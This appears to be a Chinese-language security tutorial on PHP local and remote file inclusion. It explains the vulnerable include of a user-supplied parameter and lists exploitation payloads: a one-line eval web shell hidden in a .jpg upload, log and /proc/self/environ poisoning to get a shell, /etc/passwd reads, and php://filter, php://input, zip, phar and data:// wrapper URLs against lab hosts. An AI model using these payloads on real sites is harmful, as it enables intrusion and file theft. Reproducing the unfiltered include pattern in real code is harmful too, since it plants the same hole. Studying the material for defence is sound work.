一、漏洞描述

程序在引用文件的时，引用的文件名，用户可控的情况，传入的文件名没有经过合理的校验或校验不严，从而操作了预想之外的文件，就有
可能导致文件泄漏和恶意的代码注入。
程序开发人员一般会把重复使用的函数写到单个文件中，需要使用某个函数时直接调用此文件，而无需再次编写，这种文件调用的过程一般
被称为文件包含。
程序开发人员一般希望代码更灵活，所以将被包含的文件设置为变量，用来进行动态调用，但正是由于这种灵活性，从而导致客户端可以调用
一个恶意文件，造成文件包含漏洞。
几乎所有脚本语言都会提供文件包含的功能，但文件包含漏洞在 PHP Web Application 中居多, 而在 JSP、ASP、ASP.NET 程序中却
非常少，甚至没有，这是有些语言设计的弊端。在 PHP 中经常出现包含漏洞，但这并不意味这其他语言不存在。
1
2
3
4
5
6
7
8

二、常见文件包含函数

include()：执行到 include 时才包含文件，找不到被包含文件时只会产生警告，脚本将继续执行；
require()：只要程序一运行就包含文件，找不到被包含的文件时会产生致命错误，并停止脚本；
include_once()和 require_once()：若文件中代码已被包含，则不会再次包含。
1
2
3

三、代码分析

$_GET['filename'] 接收客户端传的参数，其中没有任何过滤带入到 include 函数中，include 包含这个文件，引入到当前文件中，
因此会造成文件包含漏洞。
1
2

四、利用方法

文件包含漏洞，需要引入上传的文件到网站目录，或服务器内部的文件，而且权限是可读，才能引入进来，或远程包含进来，但是需要条件。
1

五、本地文件包含

本地包含文件，被包含的文件在本地。
1

1、文件包含/etc/passwd

如果存在漏洞，文件又存在的时候，不是 php文件会被读取显示在页面中。/etc/passwd文件是 linux 里的敏感信息，文件里存有 
linux用户的配置信息。
1
2

2、文件包含图片

寻找网站上传点，把 php 恶意代码文件改成 jpg 上传到网站上，本地包含引入恶意代码，当文件被引入后，代码就被执行。
<?php phpinfo();eval($_POST['cmd']);?>  保存为 shell.jpg

上传图片格式到网站，再用文件包含漏洞引入图片，成功执行代码。
1
2
3
4

3、包含日志文件 getshell

3.1 原理分析

中间件例如 iis 、apache、nginx 这些 web 中间件，都会记录访问日志，如果访问日志中或错误日志中，存在有 php 代码，也可以
引入到文件包含中。如果日志有 php 恶意代码，也可导致 getshell。
使用 burpsuite 访问GET ，填写 <?php phpinfo();eval($_POST[cmd]);?>
1
2
3

linux 日志文件权限默认是 root，而php 的权限是 www-data，一般情况下都是读取不了，如果是 windows 环境下，权限是允许的。
linux 默认的 apache 日志文件路径
访问日志：
/var/log/apache2/access.log
错误日志：
/var/log/apache2/error.log
把文件日志包含进来即可。
1
2
3
4
5
6
7

3.2 搭建测试环境

<?php
include $_GET['file'];

?>

1
2
3
4
5

3.3 抓包测试

3.4 包含access.log

4、包含环境变量 getshell

修改 User-Agen 填写 php 代码
1

/proc/self/environ 这个文件里保存了系统的一些变量
1

如果权限足够，包含这个文件就能 getshell
1

六、伪协议

1、介绍

1.1 常见协议

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流（I/O streams）
zlib:// — 压缩流
data:// — 数据（RFC 2397）
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流
1
2
3
4
5
6
7
8
9
10
11
12

1.2 php.ini 参数设置

在 php.ini 里有两个重要的参数：allow_url_fopen、allow_url_include。
allow_url_fopen:默认值是 ON。允许 url 里的封装协议访问文件；
allow_url_include:默认值是 OFF。不允许包含 url 里的封装协议包含文件；
1
2
3

1.3 各协议的利用条件和方法

2、php://input

php://input 可以访问请求的原始数据的只读流，将 post 请求的数据当作 php 代码执行。当传入的参数作为文件名打
开时，可以将参数设为 php://input,同时 post 想设置的文件内容，php 执行时会将 post 内容当作文件内容。
注：当 enctype="multipart/form-data"，php://input 是无效的。
php.ini 条件是 allow_url_fopen =ON、allow_url_include=ON
1
2
3
4

设置请求为 post 请求，在正文输入php 代码<?php phpinfo();?>提交即可允许。
1

2.1 test.php

<?php
include $_GET['file'];

?>
1
2
3
4

2.2 修改参数，并send

3、file:// 访问本地文件

3.1 file:///etc/passwd

在本地包含漏洞里可以使用 file 协议，使用 file 协议可以读取本地文件。
file:///etc/passwd
1
2

3.2 读取相对路径文件

http://192.168.1.50/test.php?file=./01/php.ini
1

4、php://

4.1 介绍

php:// 用于访问各个输入/输出流（I/O streams），经常使用的是 php://filter 和 php://input
php://filter 用于读取源码。
php://input 用于执行 php 代码。
1
2
3

php://filter 参数详解
1

可用的过滤器列表（4 类）
1

4.2 使用协议读取文件源码

php://filter/read=convert.base64-encode/resource=/etc/passwd
1

读取文件后再进行 base64 解码。
1

5、phar://、zip://、bzip2://、zlib://

用于读取压缩文件，zip:// 、 bzip2:// 、 zlib:// 均属于压缩流，可以访问压缩文件中的子文件，更重要的是不需
要指定后缀名，可修改为任意后缀：jpg png gif xxx 等等。

1、zip://[压缩文件绝对路径]%23[压缩文件内的子文件名]（#编码为%23）
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.tx
t
1
2
3
4
5
6

5.1 处理压缩包文件

5.2 zip://

test.php
1

<?php
include $_GET['file'];

?>
1
2
3
4

http://192.168.1.48/test.php?file=zip://C:\phpStudy\WWW\1.zip%231.jpg
1

5.3 compress.bzip2://file.bz2

http://127.0.0.1/include.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg
http://127.0.0.1/include.php?file=compress.bzip2://./file.jpg
1
2

5.4 compress.bzip2://file.bz2

http://127.0.0.1/include.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg
http://127.0.0.1/include.php?file=compress.zlib://./file.jpg
1
2

5.5 phar://

http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
1

6、data://

1、data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

2、data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
1
2
3
4
5